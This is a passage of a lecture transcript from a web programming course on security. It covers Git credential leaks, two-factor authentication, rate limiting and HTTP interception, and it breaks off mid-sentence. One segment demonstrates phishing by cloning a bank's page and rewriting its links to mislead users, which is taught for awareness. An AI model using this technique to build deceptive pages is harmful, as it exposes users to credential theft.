1 00:00:00,000 --> 00:00:03,920 [MUSIC PLAYING] 2 00:00:03,920 --> 00:00:15,647 3 00:00:15,647 --> 00:00:18,980 BRIAN YU: Welcome back, everyone, to Web Programming with Python and JavaScript, 4 00:00:18,980 --> 00:00:20,510 and welcome to our final lecture. 5 00:00:20,510 --> 00:00:23,180 So we've talked about a lot over the course of web programming 6 00:00:23,180 --> 00:00:24,305 with Python and JavaScript. 7 00:00:24,305 --> 00:00:26,840 Everything from version control to designing 8 00:00:26,840 --> 00:00:29,420 what a web page looks like using HTML and CSS, 9 00:00:29,420 --> 00:00:32,299 and then moving into programming languages like Python and JavaScript 10 00:00:32,299 --> 00:00:34,965 that are used on the server side and on the client side in order 11 00:00:34,965 --> 00:00:37,180 to build and design web applications. 12 00:00:37,180 --> 00:00:39,110 And where I thought we'd conclude today is 13 00:00:39,110 --> 00:00:41,630 by talking a little bit about security, about making sure 14 00:00:41,630 --> 00:00:43,760 that our web applications are secure, thinking 15 00:00:43,760 --> 00:00:46,250 about what sorts of security vulnerabilities 16 00:00:46,250 --> 00:00:48,629 can come about when we're thinking about web applications 17 00:00:48,629 --> 00:00:50,420 and deploying them to the internet, and how 18 00:00:50,420 --> 00:00:53,630 we can best defend against those potential vulnerabilities. 19 00:00:53,630 --> 00:00:56,644 And in doing so, we'll be taking a look back at all of the topics 20 00:00:56,644 --> 00:00:58,560 that we've talked about so far in this course, 21 00:00:58,560 --> 00:01:03,290 going from Git to HTML, to looking at Flask, SQL, our API design, 22 00:01:03,290 --> 00:01:07,130 thinking about programming in JavaScript using Django as a library later on, 23 00:01:07,130 --> 00:01:10,790 testing with continuous integration and continuous deployment, in addition 24 00:01:10,790 --> 00:01:11,720 to scalability. 25 00:01:11,720 --> 00:01:14,570 And looking through all of these past topics one at a time, 26 00:01:14,570 --> 00:01:17,540 and thinking about where security vulnerabilities might 27 00:01:17,540 --> 00:01:20,570 arise in any of these potential areas, and how we might start 28 00:01:20,570 --> 00:01:22,220 to think about defending against them. 29 00:01:22,220 --> 00:01:24,470 Some of these things will be things we have alluded to 30 00:01:24,470 --> 00:01:27,899 or talked about a little bit over the course of the semester so far. 31 00:01:27,899 --> 00:01:29,690 But today, we'll really take an opportunity 32 00:01:29,690 --> 00:01:31,940 to look at all of these topics in a little more depth 33 00:01:31,940 --> 00:01:36,080 and think about what security vulnerabilities could come up 34 00:01:36,080 --> 00:01:40,084 in the process of dealing with any of these areas within a web program. 35 00:01:40,084 --> 00:01:43,250 So where I thought we'd start is at the very beginning by talking about Git. 36 00:01:43,250 --> 00:01:46,280 So we began the semester by talking about version control using 37 00:01:46,280 --> 00:01:49,037 Git and GitHub, in particular, as a way of hosting code 38 00:01:49,037 --> 00:01:51,620 online in a place where different people from around the world 39 00:01:51,620 --> 00:01:56,250 can have shared access to a repository of code where they can push code to it. 40 00:01:56,250 --> 00:01:59,150 Or they can pull code from it using different branches and features 41 00:01:59,150 --> 00:02:01,880 like pull requests in order to better collaborate on code. 42 00:02:01,880 --> 00:02:05,594 And GitHub is really built upon this idea of open-source software, 43 00:02:05,594 --> 00:02:07,760 of software where the code isn't hidden from people, 44 00:02:07,760 --> 00:02:11,180 but is available for potentially anyone who wants to to look at that code, 45 00:02:11,180 --> 00:02:15,260 to see that code, and if they want to, propose pull requests or suggestions 46 00:02:15,260 --> 00:02:16,820 or changes to that code. 47 00:02:16,820 --> 00:02:20,120 And so let's think about open-source software just as a high level idea 48 00:02:20,120 --> 00:02:21,050 right now. 49 00:02:21,050 --> 00:02:24,140 What are some security benefits of open-source software, 50 00:02:24,140 --> 00:02:27,020 and what are some potential security concerns that might arise? 51 00:02:27,020 --> 00:02:30,810 52 00:02:30,810 --> 00:02:31,310 Sure. 53 00:02:31,310 --> 00:02:33,884 AUDIENCE: That lots of people can see it on both sides. 54 00:02:33,884 --> 00:02:34,550 BRIAN YU: Great. 55 00:02:34,550 --> 00:02:35,780 Lots of people can see it-- 56 00:02:35,780 --> 00:02:37,190 AUDIENCE: But they'll fix bugs. 57 00:02:37,190 --> 00:02:37,430 BRIAN YU: Right. 58 00:02:37,430 --> 00:02:39,200 And that has implications on both sides of things 59 00:02:39,200 --> 00:02:41,765 when it comes to bugs, which means that when you have a lot of different eyes 60 00:02:41,765 --> 00:02:44,810 all looking at the same code, there's a possibility that someone else might 61 00:02:44,810 --> 00:02:47,460 catch a bug that you missed when you were writing the software. 62 00:02:47,460 --> 00:02:49,209 But on the flip side of course, if someone 63 00:02:49,209 --> 00:02:51,950 is able to spot a vulnerability in your code by reading it 64 00:02:51,950 --> 00:02:55,158 and they don't tell you about it or any of the other maintainers of the code, 65 00:02:55,158 --> 00:02:57,710 now they're potentially able to take advantage of a security 66 00:02:57,710 --> 00:03:00,440 exploit in your code, something you didn't see coming before. 67 00:03:00,440 --> 00:03:02,690 And something that they wouldn't have otherwise known about 68 00:03:02,690 --> 00:03:04,106 had the code not been open-source. 69 00:03:04,106 --> 00:03:06,266 So open-source software in that sense can sort of 70 00:03:06,266 --> 00:03:09,515 be a double-edged sword where you have to be careful that with a lot of people 71 00:03:09,515 --> 00:03:12,680 all looking at the code, there's potential both for a lot of people 72 00:03:12,680 --> 00:03:15,470 to be able to help you in finding bugs and making security 73 00:03:15,470 --> 00:03:17,570 improvements to your code, but also areas 74 00:03:17,570 --> 00:03:19,540 where there might be vulnerabilities. 75 00:03:19,540 --> 00:03:21,500 And over the course of today, we'll be looking 76 00:03:21,500 --> 00:03:25,430 at some of those potential vulnerabilities that can exist inside 77 00:03:25,430 --> 00:03:28,940 of our web programs and taking a look at how we might 78 00:03:28,940 --> 00:03:31,820 start to try to defend against them. 79 00:03:31,820 --> 00:03:33,890 What other security considerations might come up 80 00:03:33,890 --> 00:03:36,150 when we're using Git and GitHub, in particular? 81 00:03:36,150 --> 00:03:38,150 If we're hosting our code online, you might 82 00:03:38,150 --> 00:03:41,150 think that with open-source software, we might be able to just 83 00:03:41,150 --> 00:03:42,544 make our repositories private. 84 00:03:42,544 --> 00:03:44,960 So GitHub has the option of making repositories private so 85 00:03:44,960 --> 00:03:47,520 that only certain people have access to your repository. 86 00:03:47,520 --> 00:03:49,770 So not everyone can potentially see it. 87 00:03:49,770 --> 00:03:51,850 But what dangers still might arise there? 88 00:03:51,850 --> 00:03:55,620 89 00:03:55,620 --> 00:03:58,871 Multiple possibilities. 90 00:03:58,871 --> 00:03:59,370 Sure? 91 00:03:59,370 --> 00:04:01,595 AUDIENCE: Someone had access to your GitHub account. 92 00:04:01,595 --> 00:04:02,220 BRIAN YU: Sure. 93 00:04:02,220 --> 00:04:04,094 If someone had access to your GitHub account, 94 00:04:04,094 --> 00:04:05,840 all your code is now stored online. 95 00:04:05,840 --> 00:04:08,000 Which means if some enterprising hacker is 96 00:04:08,000 --> 00:04:09,840 able to somehow gain access to your account, 97 00:04:09,840 --> 00:04:11,700 then they might be able to take advantage of that. 98 00:04:11,700 --> 00:04:13,640 And so for a long time, most websites have 99 00:04:13,640 --> 00:04:15,920 operated under a model of username and password 100 00:04:15,920 --> 00:04:18,079 being the way that you log in to a website. 101 00:04:18,079 --> 00:04:21,500 And increasingly, there are ways that hackers try and bypass 102 00:04:21,500 --> 00:04:23,270 that, by trying to either guess passwords, 103 00:04:23,270 --> 00:04:27,870 by guessing frequently used passwords, or by trying to just guess 104 00:04:27,870 --> 00:04:29,870 many, many different passwords, trying thousands 105 00:04:29,870 --> 00:04:31,786 or millions of different password combinations 106 00:04:31,786 --> 00:04:34,700 in the hopes of at least getting access to some person's account. 107 00:04:34,700 --> 00:04:37,970 And so if hackers are doing that, trying to guess at passwords very quickly 108 00:04:37,970 --> 00:04:40,250 in order to try and gain access to accounts, what can 109 00:04:40,250 --> 00:04:43,686 web applications do in order to defend against that? 110 00:04:43,686 --> 00:04:45,560 In order to defend against hackers that might 111 00:04:45,560 --> 00:04:49,620 be trying to get into other users' accounts unauthorized. 112 00:04:49,620 --> 00:04:50,120 Sure? 113 00:04:50,120 --> 00:04:53,620 AUDIENCE: They could do things like only so many misses. 114 00:04:53,620 --> 00:04:57,620 You can only have so many wrong or perhaps another kind of authentication, 115 00:04:57,620 --> 00:04:58,240 also. 116 00:04:58,240 --> 00:04:58,580 BRIAN YU: Great. 117 00:04:58,580 --> 00:04:59,960 So different possibilities exist. 118 00:04:59,960 --> 00:05:02,480 One might be placing a limit on the number of times 119 00:05:02,480 --> 00:05:04,340 you can try to log in in any period of time. 120 00:05:04,340 --> 00:05:07,230 Maybe you can only log in, or attempt to log in, five times, 121 00:05:07,230 --> 00:05:08,450 and if you miss five times, then you have 122 00:05:08,450 --> 00:05:11,710 to wait potentially an hour until you're able to log in again, for instance. 123 00:05:11,710 --> 00:05:13,100 So many applications do that. 124 00:05:13,100 --> 00:05:15,900 And then you also talked about other authentication systems. 125 00:05:15,900 --> 00:05:20,970 So what other authentication systems could there be? 126 00:05:20,970 --> 00:05:24,372 AUDIENCE: So like the the thing where you get a code pushed to your phone 127 00:05:24,372 --> 00:05:24,974 somehow. 128 00:05:24,974 --> 00:05:25,640 BRIAN YU: Great. 129 00:05:25,640 --> 00:05:27,840 So an increasingly popular form of authentication 130 00:05:27,840 --> 00:05:29,660 now is two-factor authentication. 131 00:05:29,660 --> 00:05:32,744 The idea that it's not just enough to log in with a username and password, 132 00:05:32,744 --> 00:05:35,410 but you might also want to log in with something else, something 133 00:05:35,410 --> 00:05:37,910 that is physically on you, like a phone for instance. 134 00:05:37,910 --> 00:05:40,250 Where, after you type in your username and password, 135 00:05:40,250 --> 00:05:43,250 a code is texted to your phone, or you use an app on your phone 136 00:05:43,250 --> 00:05:46,440 in order to get a special code, and then you have to type in that code. 137 00:05:46,440 --> 00:05:49,580 So that even if an attacker potentially knows your password, 138 00:05:49,580 --> 00:05:52,220 either by hacking into some database and finding the password 139 00:05:52,220 --> 00:05:54,260 or just by guessing it luckily, they're still 140 00:05:54,260 --> 00:05:56,300 not going to be able to access your account because they still 141 00:05:56,300 --> 00:05:59,460 have this added step of having to go through some two-factor authentication 142 00:05:59,460 --> 00:05:59,960 code. 143 00:05:59,960 --> 00:06:02,510 Where they now need to type in a particular code that 144 00:06:02,510 --> 00:06:05,180 is only available to someone that physically owns the device, 145 00:06:05,180 --> 00:06:06,020 like a phone. 146 00:06:06,020 --> 00:06:08,680 And that can also help to improve security as well. 147 00:06:08,680 --> 00:06:12,030 And so GitHub, for instance, has an opt-in two-factor authentication 148 00:06:12,030 --> 00:06:13,849 where you can enable that for your account 149 00:06:13,849 --> 00:06:15,890 in order to make your GitHub account more secure. 150 00:06:15,890 --> 00:06:18,860 And other websites are increasingly offering two-factor authentication 151 00:06:18,860 --> 00:06:22,430 as well, as just an additional means of trying to secure your accounts. 152 00:06:22,430 --> 00:06:27,420 And web applications are beginning to use that as a security measure as well. 153 00:06:27,420 --> 00:06:30,770 But let's think more broadly, not just about GitHub, but about Git in general, 154 00:06:30,770 --> 00:06:33,080 and this idea of version control and making changes 155 00:06:33,080 --> 00:06:35,060 and committing and saving those changes. 156 00:06:35,060 --> 00:06:38,865 And when we're thinking about pushing our commits to the internet, 157 00:06:38,865 --> 00:06:41,240 taking our changes that we've made in a GitHub repository 158 00:06:41,240 --> 00:06:43,280 and pushing them online, we want to be careful 159 00:06:43,280 --> 00:06:46,670 that sensitive information like a password or an access 160 00:06:46,670 --> 00:06:50,222 token for some service doesn't end up inside of a repository. 161 00:06:50,222 --> 00:06:53,180 Because if it does, then if it gets pushed online regardless of whether 162 00:06:53,180 --> 00:06:56,346 that repository is public or not, then there's a potential that other people 163 00:06:56,346 --> 00:07:00,020 might be able to see that access token when they probably shouldn't. 164 00:07:00,020 --> 00:07:03,710 And so imagine a situation where you're working on a repository. 165 00:07:03,710 --> 00:07:07,430 And you've made some commits and maybe accidentally, you 166 00:07:07,430 --> 00:07:09,410 put a password or some access token that you 167 00:07:09,410 --> 00:07:12,650 didn't mean to inside of one of the files, and you commit that file. 168 00:07:12,650 --> 00:07:15,650 And so credentials have now been exposed in one of the commits inside 169 00:07:15,650 --> 00:07:16,744 of your repository. 170 00:07:16,744 --> 00:07:19,160 And then later on down the line, you realize that mistake. 171 00:07:19,160 --> 00:07:21,860 You realize, oh, wait a minute, I put credentials inside that repository 172 00:07:21,860 --> 00:07:23,450 when I probably shouldn't have. 173 00:07:23,450 --> 00:07:26,330 And you make another commit removing those credentials from the file. 174 00:07:26,330 --> 00:07:28,770 So you add another commit, removing those credentials. 175 00:07:28,770 --> 00:07:33,110 And now those credentials are no longer in the head of the repository. 176 00:07:33,110 --> 00:07:35,540 You've taken them out, you've committed that removal. 177 00:07:35,540 --> 00:07:38,191 Is that secure? 178 00:07:38,191 --> 00:07:38,690 No. 179 00:07:38,690 --> 00:07:39,689 I see you shaking heads. 180 00:07:39,689 --> 00:07:40,410 Why not? 181 00:07:40,410 --> 00:07:42,560 AUDIENCE: Because you can see all the history. 182 00:07:42,560 --> 00:07:42,830 BRIAN YU: Great. 183 00:07:42,830 --> 00:07:45,860 Because of Git's version control system, the fact that it's saving every time 184 00:07:45,860 --> 00:07:47,870 you make a commit, it's saving your entire history. 185 00:07:47,870 --> 00:07:50,510 Which means that even though-- if you look at all of your files 186 00:07:50,510 --> 00:07:51,800 in their current state now-- 187 00:07:51,800 --> 00:07:55,340 those credentials are not there, anyone who has access to that repository 188 00:07:55,340 --> 00:07:57,230 has access to the full history of commits. 189 00:07:57,230 --> 00:07:59,950 They can go back and look at your previous commit messages, 190 00:07:59,950 --> 00:08:03,200 the previous files you've changed, and what your files looked like every stage 191 00:08:03,200 --> 00:08:04,200 along the way. 192 00:08:04,200 --> 00:08:07,610 And so once you've exposed those credentials, now 193 00:08:07,610 --> 00:08:09,470 even if you make another commit after that, 194 00:08:09,470 --> 00:08:11,250 those credentials are still going to be there. 195 00:08:11,250 --> 00:08:12,666 And so there are ways around this. 196 00:08:12,666 --> 00:08:16,610 There are ways of reverting back to a previous commit and pruning away all 197 00:08:16,610 --> 00:08:20,270 the extra commits, and then what we would call force pushing those commits 198 00:08:20,270 --> 00:08:21,920 back to GitHub in order to update it. 199 00:08:21,920 --> 00:08:24,404 But generally, once you've pushed code to GitHub, 200 00:08:24,404 --> 00:08:27,320 you might want to imagine all of that code as potentially compromised. 201 00:08:27,320 --> 00:08:29,570 So if you had passwords or security credentials 202 00:08:29,570 --> 00:08:32,270 or other keys inside of your repository that you accidentally 203 00:08:32,270 --> 00:08:35,669 pushed to GitHub, probably a good idea to just exchange those credentials 204 00:08:35,669 --> 00:08:38,510 altogether in order to get new ones because there 205 00:08:38,510 --> 00:08:41,419 is the potential that those credentials could be compromised once 206 00:08:41,419 --> 00:08:42,606 they're pushed. 207 00:08:42,606 --> 00:08:44,480 And so those are some security considerations 208 00:08:44,480 --> 00:08:47,600 that might come about when we're thinking about Git and GitHub. 209 00:08:47,600 --> 00:08:51,184 But let's take a look now to actually writing code and taking a look at HTML. 210 00:08:51,184 --> 00:08:54,100 So HTML, remember we were using in the very beginning of this semester 211 00:08:54,100 --> 00:08:56,990 and all throughout the semester in order to design web pages 212 00:08:56,990 --> 00:09:00,920 and were just consisting of tags where we had our body tags and different tags 213 00:09:00,920 --> 00:09:03,080 for creating lists or creating forms or creating 214 00:09:03,080 --> 00:09:04,980 buttons and so on and so forth. 215 00:09:04,980 --> 00:09:09,270 What security vulnerabilities might come about from just purely HTML? 216 00:09:09,270 --> 00:09:13,580 Or how might HTML be used to trick users into doing something 217 00:09:13,580 --> 00:09:17,550 that a malicious attacker might want them to do? 218 00:09:17,550 --> 00:09:18,050 Yeah? 219 00:09:18,050 --> 00:09:24,284 AUDIENCE: In browser, we can see HTML by going to [INAUDIBLE].. 220 00:09:24,284 --> 00:09:24,950 BRIAN YU: Great. 221 00:09:24,950 --> 00:09:28,010 Inside of a browser, for instance, you can inspect at a website, 222 00:09:28,010 --> 00:09:29,870 and you can take a look at all of the code. 223 00:09:29,870 --> 00:09:31,590 And so what are the implications of that? 224 00:09:31,590 --> 00:09:35,390 Well, that means that if I wanted to, I could, for instance, go into my browser 225 00:09:35,390 --> 00:09:38,574 and go to, I don't know, bankofamerica.com for instance. 226 00:09:38,574 --> 00:09:41,240 And I could pull up, OK, here's Bank of America's website, which 227 00:09:41,240 --> 00:09:44,570 is really just HTML that's been rendered onto my screen. 228 00:09:44,570 --> 00:09:47,540 And if I wanted to know what code is Bank of America using in order 229 00:09:47,540 --> 00:09:50,090 to make any of this stuff happen, I could reasonably 230 00:09:50,090 --> 00:09:54,060 control click on the site, click on View Page Source, 231 00:09:54,060 --> 00:09:57,464 and what that pulls up for me is a whole bunch of HTML. 232 00:09:57,464 --> 00:10:00,380 It's a whole bunch of it, and I don't really know what all of it does. 233 00:10:00,380 --> 00:10:03,530 But if I just take it all and copy it to my clipboard, 234 00:10:03,530 --> 00:10:07,670 and I go into a text editor and create a new file-- 235 00:10:07,670 --> 00:10:10,670 I'll call it bank.html-- 236 00:10:10,670 --> 00:10:13,310 and I'm just going to paste in all of that code 237 00:10:13,310 --> 00:10:15,530 that I just copied off Bank of America's website. 238 00:10:15,530 --> 00:10:18,405 I didn't have to write any of it, just copied it straight from there. 239 00:10:18,405 --> 00:10:22,560 Now if I go ahead and open bank.html, this file I just created, 240 00:10:22,560 --> 00:10:24,980 now I've effectively recreated Bank of America's website 241 00:10:24,980 --> 00:10:26,540 just by copying their HTML. 242 00:10:26,540 --> 00:10:29,810 And if I now host this from my own web server, for instance, 243 00:10:29,810 --> 00:10:32,907 I might be able to trick unsuspecting users into thinking that this 244 00:10:32,907 --> 00:10:34,490 is actually Bank of America's website. 245 00:10:34,490 --> 00:10:37,615 Because just at first glance, it looks quite reasonably like the same thing 246 00:10:37,615 --> 00:10:39,530 because it's the exact same HTML. 247 00:10:39,530 --> 00:10:41,420 And if I'm really enterprising, I can think 248 00:10:41,420 --> 00:10:43,753 about actually trying to make modifications to this code 249 00:10:43,753 --> 00:10:48,520 in order to even better be able to try and maliciously take advantage 250 00:10:48,520 --> 00:10:51,020 of a user who might unsuspectingly be arriving at this site, 251 00:10:51,020 --> 00:10:54,650 not realizing that it's not the actual Bank of America website. 252 00:10:54,650 --> 00:10:57,830 I might, for instance, take this Forgot Passcode button 253 00:10:57,830 --> 00:11:00,320 down here-- which is probably a link to some page 254 00:11:00,320 --> 00:11:02,990 where they might type in their email address or try and type 255 00:11:02,990 --> 00:11:05,420 in some new passcode that they want for instance-- 256 00:11:05,420 --> 00:11:08,750 and I might just take this HTML file, and I'll just 257 00:11:08,750 --> 00:11:12,440 search for forgot passcode. 258 00:11:12,440 --> 00:11:13,520 And OK, here it is. 259 00:11:13,520 --> 00:11:14,840 Here's forgot passcode. 260 00:11:14,840 --> 00:11:19,950 And if we notice, it's located inside of an a tag-- an anchor tag-- 261 00:11:19,950 --> 00:11:23,270 which has this href attribute, which is going 262 00:11:23,270 --> 00:11:26,390 to be where the user is linked to if they were to ever click on 263 00:11:26,390 --> 00:11:28,260 that I forgot my password button. 264 00:11:28,260 --> 00:11:31,940 And so if I take this link, this secure.bankofamerica.com/login 265 00:11:31,940 --> 00:11:36,720 something, and instead of linking to that, link to, I don't know, 266 00:11:36,720 --> 00:11:41,600 htps cs50.github.io/web or whatever other page I want to redirect the user 267 00:11:41,600 --> 00:11:42,740 to. 268 00:11:42,740 --> 00:11:46,479 Now if I refresh the site, it looks like Bank of America's website once again, 269 00:11:46,479 --> 00:11:49,520 but when they go over here and they try and click on this Forgot Passcode 270 00:11:49,520 --> 00:11:52,566 button, now they're taken to our website or whatever website 271 00:11:52,566 --> 00:11:53,690 I want to take the user to. 272 00:11:53,690 --> 00:11:57,350 I can modify the HTML that they have in order to direct them anywhere. 273 00:11:57,350 --> 00:12:00,230 And so that's sort of one of the common ways 274 00:12:00,230 --> 00:12:03,560 that attackers are able to use HTML to try and trick users 275 00:12:03,560 --> 00:12:04,689 into doing something. 276 00:12:04,689 --> 00:12:06,980 In particular, noting the fact that you can take a link 277 00:12:06,980 --> 00:12:08,930 and make it look like it's going anywhere, but really 278 00:12:08,930 --> 00:12:10,638 take the user to somewhere that you want. 279 00:12:10,638 --> 00:12:15,620 I can have something like this where if I just have a href equals url1-- 280 00:12:15,620 --> 00:12:19,130 where url1 is where I want the user to be taken to 281 00:12:19,130 --> 00:12:23,640 and url2 is just the text that appears to the user-- 282 00:12:23,640 --> 00:12:25,880 then the user might reasonably be tricked 283 00:12:25,880 --> 00:12:30,390 into thinking that they're going to url2 when in reality, they're going to url1. 284 00:12:30,390 --> 00:12:36,970 And so a simple example of that might be inside of link.html here. 285 00:12:36,970 --> 00:12:38,750 We're in link.html. 286 00:12:38,750 --> 00:12:42,140 It's a very simple HTML website, where on inside of my body tag, 287 00:12:42,140 --> 00:12:44,870 I have an anchor tag, which is just going to be a link. 288 00:12:44,870 --> 00:12:48,870 And the href of that link is this course's website, for instance. 289 00:12:48,870 --> 00:12:53,870 But in between the a tags, what I have is just google.com, for instance. 290 00:12:53,870 --> 00:12:58,460 And so what that means is that if I were to open up link.html, 291 00:12:58,460 --> 00:13:02,150 for instance, what the user sees is something like this, 292 00:13:02,150 --> 00:13:03,890 a page that just has a link to Google. 293 00:13:03,890 --> 00:13:05,690 And they might reasonably think that clicking on that link 294 00:13:05,690 --> 00:13:08,606 should take them to Google when in fact, when they click on that link, 295 00:13:08,606 --> 00:13:10,950 they're taken here instead, to the course web page. 296 00:13:10,950 --> 00:13:12,866 And so you can imagine how this might actually 297 00:13:12,866 --> 00:13:15,520 be able to be used in order to create potential exploits. 298 00:13:15,520 --> 00:13:18,470 So that if someone were to take Bank of America's URL, 299 00:13:18,470 --> 00:13:22,910 and I go to link.html and say, all right, we'll put Bank of America here, 300 00:13:22,910 --> 00:13:26,640 and in the href, instead put bank.html, for instance, 301 00:13:26,640 --> 00:13:31,550 which is the link to the file that I created copying Bank of America's code. 302 00:13:31,550 --> 00:13:37,490 Now suddenly, when I open up link.html, I 303 00:13:37,490 --> 00:13:40,190 get a link that looks like it is linking to Bank of America. 304 00:13:40,190 --> 00:13:41,981 I click on that link, and I get a page that 305 00:13:41,981 --> 00:13:43,730 looks like Bank of America's website. 306 00:13:43,730 --> 00:13:46,855 And if I click on forgot my passcode, now I'm redirected to some other side 307 00:13:46,855 --> 00:13:47,390 altogether. 308 00:13:47,390 --> 00:13:51,540 And so these are common ways that exploits 309 00:13:51,540 --> 00:13:54,290 are able to happen by taking advantage of security vulnerabilities 310 00:13:54,290 --> 00:13:57,350 like this where we're really just relying on people not being aware 311 00:13:57,350 --> 00:13:59,510 of the fact that clicking on a link might take them 312 00:13:59,510 --> 00:14:01,477 to somewhere else different altogether. 313 00:14:01,477 --> 00:14:03,560 And so how do you defend against things like this? 314 00:14:03,560 --> 00:14:05,210 Well, one good strategy from the user end 315 00:14:05,210 --> 00:14:07,668 is just to be careful about the links that you're clicking. 316 00:14:07,668 --> 00:14:10,910 In Chrome, for instance, if you hover over a link, down in the lower left, 317 00:14:10,910 --> 00:14:12,279 you can see this-- 318 00:14:12,279 --> 00:14:14,570 it's in small text, so you might not be able to see it, 319 00:14:14,570 --> 00:14:17,519 but this is the actual link that this link is going to be going to. 320 00:14:17,519 --> 00:14:19,310 So you can't always trust what the text is. 321 00:14:19,310 --> 00:14:22,643 You might want to look very carefully at where that link is actually taking you. 322 00:14:22,643 --> 00:14:26,330 And so these are just some examples of HTML being used in order 323 00:14:26,330 --> 00:14:29,600 to create potential security exploits. 324 00:14:29,600 --> 00:14:31,776 Questions about any of that so far? 325 00:14:31,776 --> 00:14:32,276 Yeah? 326 00:14:32,276 --> 00:14:37,510 AUDIENCE: So why does our browser allow us to see a source 327 00:14:37,510 --> 00:14:38,699 code in the first place? 328 00:14:38,699 --> 00:14:39,740 BRIAN YU: Great question. 329 00:14:39,740 --> 00:14:43,050 Why do web browsers allow us to see the source code in the first place? 330 00:14:43,050 --> 00:14:47,210 Well, in a sense, the web browser, what it's getting is the source code. 331 00:14:47,210 --> 00:14:50,510 So when a web browser is making a request to bankofamerica.com, 332 00:14:50,510 --> 00:14:55,760 for instance, bankofamerica.com needs to give back information to my computer. 333 00:14:55,760 --> 00:14:58,375 And that information needs to be the code, the HTML, 334 00:14:58,375 --> 00:14:59,750 that is going to render the page. 335 00:14:59,750 --> 00:15:03,740 So hypothetically, a browser might be able to just not make it easily 336 00:15:03,740 --> 00:15:05,480 accessible to get to that source code. 337 00:15:05,480 --> 00:15:07,610 But anyone who wants to, if you're really enterprising, 338 00:15:07,610 --> 00:15:10,340 could just look at the information that's coming back from the server. 339 00:15:10,340 --> 00:15:13,200 That information will contain the source code one way or another. 340 00:15:13,200 --> 00:15:15,710 So there's really no way to hide it. 341 00:15:15,710 --> 00:15:16,646 Good question, though. 342 00:15:16,646 --> 00:15:19,611 343 00:15:19,611 --> 00:15:20,110 All right. 344 00:15:20,110 --> 00:15:24,550 So that was HTML being used in order to create potential security 345 00:15:24,550 --> 00:15:26,771 vulnerabilities or security exploits. 346 00:15:26,771 --> 00:15:29,770 Let's take a look now, by moving on one week, and talking about a Flask. 347 00:15:29,770 --> 00:15:33,430 So we talked about moving on from just creating static web pages that 348 00:15:33,430 --> 00:15:37,330 are displaying HTML content to using the web server, where we're communicating 349 00:15:37,330 --> 00:15:40,510 between the server and the user, sending packets of information 350 00:15:40,510 --> 00:15:41,440 along the internet. 351 00:15:41,440 --> 00:15:44,148 And as soon as we start dealing with that, packets of information 352 00:15:44,148 --> 00:15:46,850 going from one server to a client, traveling between routers, 353 00:15:46,850 --> 00:15:49,940 now we start to deal with other security concerns as well. 354 00:15:49,940 --> 00:15:53,590 So here, we'll start to talk about HTTP, Hypertext Transfer Protocol, which 355 00:15:53,590 --> 00:15:57,130 is typically used to send packets of information across the internet, 356 00:15:57,130 --> 00:16:00,610 as well as HTTPS, which is a more secure version of that, which 357 00:16:00,610 --> 00:16:03,170 we'll take a look at in just a moment. 358 00:16:03,170 --> 00:16:04,855 So let's imagine this diagram. 359 00:16:04,855 --> 00:16:06,730 I have one computer here, maybe it's a server 360 00:16:06,730 --> 00:16:08,554 running some Flask web application. 361 00:16:08,554 --> 00:16:10,720 And I have a client over here, which is maybe asking 362 00:16:10,720 --> 00:16:12,520 for information from that web server. 363 00:16:12,520 --> 00:16:14,350 In other words, I've got two computers that 364 00:16:14,350 --> 00:16:16,934 need to communicate with each other over the internet somehow. 365 00:16:16,934 --> 00:16:19,433 And maybe they've never communicated with each other before, 366 00:16:19,433 --> 00:16:21,367 so they need to talk to each other somehow. 367 00:16:21,367 --> 00:16:23,950 And so this computer might want to send packets of information 368 00:16:23,950 --> 00:16:24,887 to the other computer. 369 00:16:24,887 --> 00:16:27,970 But of course, that information doesn't go to the other computer directly. 370 00:16:27,970 --> 00:16:30,010 It needs to travel over the internet, traveling 371 00:16:30,010 --> 00:16:32,770 between different routers and different servers for instance, 372 00:16:32,770 --> 00:16:35,012 before it gets from point A to point B. And likewise, 373 00:16:35,012 --> 00:16:37,720 when information wants to come back from that computer over there 374 00:16:37,720 --> 00:16:40,240 to this computer, we also need to have information 375 00:16:40,240 --> 00:16:42,970 that is traveling through the internet that's potentially going 376 00:16:42,970 --> 00:16:45,190 to all of these routers in between. 377 00:16:45,190 --> 00:16:47,480 And so just looking at this diagram, what's 378 00:16:47,480 --> 00:16:52,343 a security vulnerability that seems clear just from a basic perspective? 379 00:16:52,343 --> 00:16:55,794 380 00:16:55,794 --> 00:16:56,780 Yeah? 381 00:16:56,780 --> 00:17:01,294 AUDIENCE: Changing HTTP header could-- 382 00:17:01,294 --> 00:17:01,960 BRIAN YU: Great. 383 00:17:01,960 --> 00:17:03,200 So changing HTTP headers. 384 00:17:03,200 --> 00:17:06,760 That's an interesting thought, that if this request is getting passed from-- 385 00:17:06,760 --> 00:17:09,450 a request goes from this computer through all these routers 386 00:17:09,450 --> 00:17:12,510 into this computer, potentially, one of the servers in the middle, 387 00:17:12,510 --> 00:17:16,344 one of these routers, might be able to change that request, for instance, 388 00:17:16,344 --> 00:17:19,260 in order to try and make a request that's slightly different than what 389 00:17:19,260 --> 00:17:20,670 the original user wanted. 390 00:17:20,670 --> 00:17:23,400 Or likewise, because any of these intermediary routers 391 00:17:23,400 --> 00:17:27,089 have access to the full contents of whatever request is being passed 392 00:17:27,089 --> 00:17:30,550 or response is being passed back and forth between these two computers, 393 00:17:30,550 --> 00:17:34,554 anyone in the middle of this process could potentially take that information 394 00:17:34,554 --> 00:17:35,470 and have access to it. 395 00:17:35,470 --> 00:17:37,340 They could read an email that's being sent 396 00:17:37,340 --> 00:17:40,650 or the contents of a web page response that's being sent from one computer 397 00:17:40,650 --> 00:17:43,090 to the other because that packet of information 398 00:17:43,090 --> 00:17:45,610 is just traveling over the internet. 399 00:17:45,610 --> 00:17:47,895 So how do we solve that problem? 400 00:17:47,895 --> 00:17:48,805 Yeah? 401 00:17:48,805 --> 00:17:50,170 AUDIENCE: Encrypt traffic. 402 00:17:50,170 --> 00:17:50,950 BRIAN YU: Encrypt traffic. 403 00:17:50,950 --> 00:17:51,450 Great. 404 00:17:51,450 --> 00:17:54,490 Cryptography is this idea of encrypting information, of making sure-- 405 00:17:54,490 --> 00:17:56,740 so that we can encrypt our information so it's not 406 00:17:56,740 --> 00:17:59,440 the plain text of the request or the response 407 00:17:59,440 --> 00:18:02,560 that's getting sent over the internet, but rather some ciphertext, 408 00:18:02,560 --> 00:18:06,489 some encrypted version of that plain text, such that someone in the middle 409 00:18:06,489 --> 00:18:07,780 can't just immediately read it. 410 00:18:07,780 --> 00:18:10,360 And there are all sorts of different cryptography algorithms. 411 00:18:10,360 --> 00:18:12,880 And we'll talk high level about a couple of the ideas that 412 00:18:12,880 --> 00:18:14,650 go 